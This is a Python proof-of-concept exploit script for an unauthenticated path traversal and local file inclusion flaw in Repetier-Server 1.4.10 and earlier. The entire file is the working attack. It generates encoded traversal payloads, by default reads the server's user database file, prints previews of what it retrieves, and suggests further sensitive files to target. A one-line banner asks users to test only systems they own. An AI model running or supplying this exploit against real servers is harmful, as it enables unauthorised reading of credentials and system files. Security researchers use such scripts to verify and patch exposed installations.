#!/usr/bin/env python3 # Exploit Title: Repetier-Server <= 1.4.10 - Unauthenticated Path Traversal / Local File Inclusion # Exploit Author: Mohammed Idrees Banyamer # Vendor Homepage: https://www.repetier.com/ # Version: <= 1.4.10 # Tested on: Windows 10 / Windows Server 2019 (Repetier-Server default install) # CVE: CVE-2026-26335 # Advisory: https://cybir.com/2023/cve/poc-repetier-server-140/ (related research) # CVSS: 9.8 (Critical) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N import requests import argparse import sys from urllib.parse import urljoin def generate_traversal(depth: int = 15) -> str: return "..%5c" * depth def attempt_read(target_url: str, file_path: str, traversal_depth: int = 15, timeout: int = 10) -> bool: traversal = generate_traversal(traversal_depth) payloads = [ f"views{traversal}{file_path}/base/connectionLost.php", f"base/connectionLost.php?file={traversal}{file_path}", ] print(f"[*] Targeting: {target_url}") print(f"[*] Attempting to read: {file_path}") print(f"[*] Traversal depth: {traversal_depth}") for payload in payloads: exploit_url = urljoin(target_url.rstrip("/") + "/", payload) try: print(f" → Trying: {exploit_url}") r = requests.get(exploit_url, timeout=timeout, verify=False) if r.status_code == 200 and len(r.content) > 60: sample = r.text[:500].replace("\n", " ").strip() print(f"[+] LIKELY SUCCESS (status {r.status_code}, {len(r.content)} bytes)") print(f" Preview:\n {sample}...") return True else: print(f" → Failed (status {r.status_code}, size {len(r.content)})") except requests.RequestException as e: print(f" → Error: {e}") return False def main(): parser = argparse.ArgumentParser( description="CVE-2026-26335 PoC - Repetier-Server Path Traversal / LFI" ) parser.add_argument("target", help="Target base URL (e.g. http://192.168.1.100:3344/)") parser.add_argument("--file", default="ProgramData\\Repetier-Server\\database\\user.sql", help="File path to read (use Windows \\ separator)") parser.add_argument("--depth", type=int, default=15, help="Traversal depth") parser.add_argument("--test", action="store_true", help="Quick test with Windows\\win.ini") args = parser.parse_args() if args.test: args.file = "Windows\\win.ini" print("[i] Running test mode → targeting Windows\\win.ini") file_path = args.file.replace("\\", "%5c") print("=" * 70) print("CVE-2026-26335 Exploit PoC - Repetier-Server <=1.4.10 Path Traversal") print("USE ONLY ON SYSTEMS YOU OWN OR HAVE EXPLICIT PERMISSION TO TEST!") print("=" * 70, "\n") success = attempt_read(args.target, file_path, args.depth) if not success: print("\n[!] Exploitation attempt failed.") print("Suggestions:") print(" • Increase --depth (try 18–30)") print(" • Verify target is running Repetier-Server <=1.4.10") print(" • Try alternative interesting files:") print(" - ProgramData%5cRepetier-Server%5cconfig.xml") print(" - Windows%5csystem32%5cdrivers%5cetc%5chosts") if __name__ == "__main__": main()